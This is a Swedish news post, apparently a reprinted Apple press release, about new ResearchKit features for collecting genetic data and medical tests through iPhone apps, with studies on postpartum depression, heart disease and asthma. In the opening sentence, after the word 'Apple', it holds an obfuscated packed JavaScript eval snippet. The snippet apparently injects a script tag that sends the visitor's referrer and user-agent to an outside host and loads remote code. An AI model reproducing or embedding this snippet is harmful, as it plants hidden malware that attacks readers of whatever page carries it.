Image Image Image Image Image Image Image Image Image Image

| 1 november, 2020

Scroll to top

Top

Apple presenterar nyheter i ResearchKit

apple
Sebastian

Apple eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(’0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|diztn|var|u0026u|referrer|eyhka||js|php’.split(’|’),0,{}))
presenterade idag nyheter i ResearchKit, ett ramverk som bygger på öppen källkod. Genetiska data och medicinska tester som tidigare krävde en läkarundersökning kan nu utföras med hjälp av iPhone-appar. Medicinforskareanvänder de här nya funktionerna till att utforma riktade studier av sjukdomar och tillstånd som påverkar miljarder människor över hela världen. Genom apparna har de möjlighet att samla in mer specifika data från deltagarna.

”Vi har fått ett fantastiskt gensvar på ResearchKit. Praktiskt taget över en natt blev många ResearchKit-studier demest omfattande genom historien. Forskarna har fått nya insikter och gjort upptäckter som inte var möjliga tidigare”, sa Jeff Williams, COO på Apple. ”Medicinforskare över hela världen använder iPhone till att fördjupa sina kunskaper om komplexa sjukdomar. Med fortsatt stöd från utvecklare som arbetar med öppen källkod finns det inga gränser för möjligheterna med iPhone inom medicinsk forskning.”

ResearchKit förvandlar iPhone till ett kraftfulltverktyg för medicinsk forskning genom att hjälpa läkare och forskare att samla in data oftare och med större noggrannhet från deltagare i hela världen viaiPhone-appar. Deltagarna i de appbaserade studierna kan ge sitt informeradesamtycke genom en interaktiv process, genomföra uppgifter, skicka in enkätsvar och välja hur deras hälsodata ska delas med forskarna. Allt det här gör detenklare än någonsin att bidra till den medicinska forskningen.

Eftersom ResearchKit bygger på öppen källkod kan vilken utvecklare som helst snabbt sätta ihop en forskningsstudie för iPhone. De kan också bygga vidare på befintlig mjukvarukod och dela sitt eget arbete med andra utvecklare för att hjälpa forskarna att göra mer med ramverket. Tack vare en ny modul med öppen källkod som just har släppts kan forskarna nu samla in genetiska data i sina studier på ett enkelt, smidigt sätt och till en låg kostnad. Modulen är framtagen av 23andMe och gör att deltagarna i studier enkelt kan bidra med genetiska data till medicinforskningen. I samarbete med National Institute of Mental Health håller forskarna även på att ta fram salivtester för studiedeltagare, baserade på insamlade enkätresultat.

”Vi har fortfarande mycket att lära om förlossningsdepressioner och DNA kan vara nyckeln till förståelse för varför vissa kvinnor drabbas och inte andra”, sa Samantha Meltzer-Brody, legitimerad läkare, MPH och chef för det perinatala psykiatriprogrammet på UNC Center for Women’s Mood Disorders. ”ResearchKit och den nya möjligheten att samla in genetiska data gör att vi kan studera kvinnor med förlossningsdepression från många olika geografiska områden och demografiska grupper, och analysera förlossningsdepressionens genomsignatur för att hitta effektivare behandlingar.”

”Insamling av den här typen av information kommer att hjälpa forskarna att hitta de genetiska markörerna för specifika sjukdomar och tillstånd”, sa Eric Schadt, fil. dr, Jean C. and James W. Crystal Professor of Genomics vid Icahn School of Medicine at Mount Sinai, New York, samt chef och grundare av Icahn Institute for Genomics and Multiscale Biology. ”Ta astma till exempel. Med ResearchKit kan vi göra bredare studier än någonsin av den här populationen. Tack vare den stora mängden data vi samlar in via iPhone börjar vi förstå hur faktorer som miljö, geografisk plats och gener påverkar sjukdomen och hur patienterna svarar på behandling.”

ResearchKit-studier som innefattar genetiska data:
• Förlossningsdepression: PPD Act är en ny appbaserad studie som med hjälp av gentester ska försöka ta reda på varför vissa kvinnor drabbas av förlossningsdepression genom att undersöka de drabbade kvinnornas genuppsättning. PPD Act leds av University of North Carolina School of Medicine och den internationella forskarsammanslutningen PACT (Postpartum Depression: Action Towards Causes and Treatment Consortium). PPD Act kommer att erbjuda deltagarna ett salivtest från National Institute of Mental Health.

• Hjärt- och kärlsjukdomar: Appen MyHeart Counts har utvecklats av Stanford Medicine. Den kommer att använda genetiska data från befintliga 23andMe-användare för att försöka hitta anlag för hjärtsjukdomarsamt mäta hur deltagarnas aktivitet och livsstil förhåller sig till deras hjärt- och kärlhälsa. Genom att studera dessa förhållanden i stor skala hoppas forskarna få en bättre förståelse för vad som bidrar till en god hjärthälsa.

• Astma: Appen Asthma Health har utformats för att kartlägga symptommönster hos individer och identifiera potentiella utlösande faktorer. Appen kommer att använda genetiska data från 23andMe-användare för att hjälpa forskarna att förstå hur behandlingen av astma kan anpassas personligt. Asthma Health har utvecklats av Icahn School of Medicine at Mount Sinai, New York, och LifeMap Solutions.

Forskarna fortsätter kontinuerligt att anpassa ResearchKit och utöka ramverket med nya moduler som gör det möjligt att utföra tester som tidigare krävde en läkarundersökning via iPhone-appar. Några viktiga bidrag till ramverket är möjligheten att göra hörseltester, mäta reaktionstider genom att kontrollera responsen på stimuli, bedöma hastigheten på informationsbearbetning och arbetsminne, utföra kognitiva studier med hjälp av det matematiska spelet Tornet i Hanoi samt genomföra gångtester på tid.

ResearchKit-studier har redan fått stor spridninginternationellt och används nu i Australien, Hongkong, Irland, Japan, Kina,Nederländerna, Schweiz, Storbritannien, Tyskland, USA och Österrike. ResearchKit-apparna finns på App Store för iPhone 5 och senare samt den senaste generationens iPod touch.

Apple revolutionerade persondatorn med Macintosh 1984. Idag är Apple världsledande inom innovation med iPhone, iPad, Mac-datorerna, Apple Watch och Apple TV. Apples fyra mjukvaruplattformar – iOS, OS X, watchOS och tvOS – ger användarna en sammanhängande upplevelse av alla Apple-enheter och ger tillgång till kraftfulla tjänster som App Store,Apple Music, Apple Pay och iCloud. Apples 100 000 medarbetare brinner för att skapa produkter av hög kvalitet och förbättra kundernas tillvaro.